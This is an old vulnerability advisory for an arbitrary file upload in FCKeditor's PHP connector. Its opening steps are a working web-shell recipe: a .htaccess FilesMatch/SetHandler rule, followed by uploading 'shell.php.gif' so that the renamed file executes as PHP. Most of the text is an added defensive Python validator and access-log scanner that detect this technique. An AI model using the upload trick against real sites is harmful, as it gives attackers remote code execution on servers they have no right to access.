FCKeditor upload vulnerability, all PHP versions
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author: sinesafe.cn
[+] Website: WwW.sinesafe.cn
---------------------------------------
1. Create a .htaccess file:
code:
    <FilesMatch "_php.gif">
        SetHandler application/x-httpd-php
    </FilesMatch>
2. Now upload this .htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
---------------------------------------
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is automatically changed to "shell_php.gif".
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now reachable on the server.
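The chain above works because two things are allowed at once: a .htaccess file can be uploaded into a web-served directory, and FCKeditor's rename of "shell.php.gif" to "shell_php.gif" leaves a name the attacker's FilesMatch rule can map onto the PHP handler. The following is an added defensive example, not code from sinesafe.cn or from the FCKeditor project: a file-name policy for the upload endpoint that rejects dot-files, multiple extensions and the mangled "_php" stem, plus a scan of access-log lines for requests that hit such names in the upload directory. The allowed-extension list, the /userfiles/ prefix and the log lines are constructed assumptions.

```python
import re
from pathlib import PurePosixPath

# Assumed policy for an image-upload endpoint; adjust to the deployment.
ALLOWED_EXTS = {"gif", "jpg", "jpeg", "png"}
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}
SERVER_CONFIG_NAMES = {".htaccess", ".htpasswd", ".user.ini", "web.config"}
# Assumption: directory the upload connector writes into. FCKeditor's default
# UserFilesPath is /userfiles/; confirm against the real configuration.
UPLOAD_PREFIX = "/userfiles/"

# Matches a stem such as 'shell_php', the result of FCKeditor renaming
# 'shell.php.gif' to 'shell_php.gif'.
_MANGLED_EXEC = re.compile(r"_(" + "|".join(sorted(EXECUTABLE_EXTS)) + r")$")


def check_upload_name(filename: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a client-supplied file name.

    Rejects dot-files such as .htaccess, anything but a single allow-listed
    image extension (so 'shell.php.gif' never gets as far as the rename),
    and stems ending in '_php' and friends, since a FilesMatch rule on
    '_php.gif' would hand such a file to the PHP handler.
    """
    # Take only the last path component so '..\\.htaccess' cannot sneak through.
    name = PurePosixPath(filename.replace("\\", "/")).name.strip().lower()
    if not name or name.startswith("."):
        return False, "empty name or dot-file"
    if name in SERVER_CONFIG_NAMES:
        return False, "server configuration file"
    stem, *exts = name.split(".")
    if len(exts) != 1 or exts[0] not in ALLOWED_EXTS:
        return False, "extension not a single allow-listed image type"
    if _MANGLED_EXEC.search(stem):
        return False, "stem ends in an executable-extension suffix"
    return True, "ok"


# Apache combined/common log format: ip ident user [time] "method target proto" status
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def suspicious_upload_requests(log_text: str) -> list[tuple[str, str, str]]:
    """Flag requests for files under UPLOAD_PREFIX whose name fails the policy.

    A request for '<anything>_php.gif' or '.htaccess' inside the upload
    directory is the after-the-fact signature of the technique described above.
    """
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        path = target.split("?", 1)[0]          # drop the query string
        if not path.startswith(UPLOAD_PREFIX):
            continue                            # application paths are out of scope
        ok, reason = check_upload_name(PurePosixPath(path).name)
        if not ok:
            hits.append((ip, path, reason))
    return hits


# Constructed sample log; the addresses, paths and times are made up.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [25/Oct/2011:07:39:07 +0800] "POST /FCKeditor/upload HTTP/1.1" 200 312
10.0.0.5 - - [25/Oct/2011:07:39:20 +0800] "GET /userfiles/shell_php.gif HTTP/1.1" 200 77
10.0.0.7 - - [25/Oct/2011:07:40:01 +0800] "GET /userfiles/photo.gif HTTP/1.1" 200 4096
10.0.0.5 - - [25/Oct/2011:07:40:30 +0800] "GET /userfiles/.htaccess HTTP/1.1" 403 199
"""

if __name__ == "__main__":
    for candidate in ("photo.gif", ".htaccess", "shell.php.gif", "shell_php.gif"):
        print(candidate, check_upload_name(candidate))
    for hit in suspicious_upload_requests(SAMPLE_ACCESS_LOG):
        print("suspicious:", hit)
```

The name check belongs in the connector before the file is written, and is a complement to, not a substitute for, the server-side fix: setting AllowOverride None on the upload directory makes Apache ignore any .htaccess placed there, so a SetHandler rule in an uploaded file has no effect regardless of what the file is called.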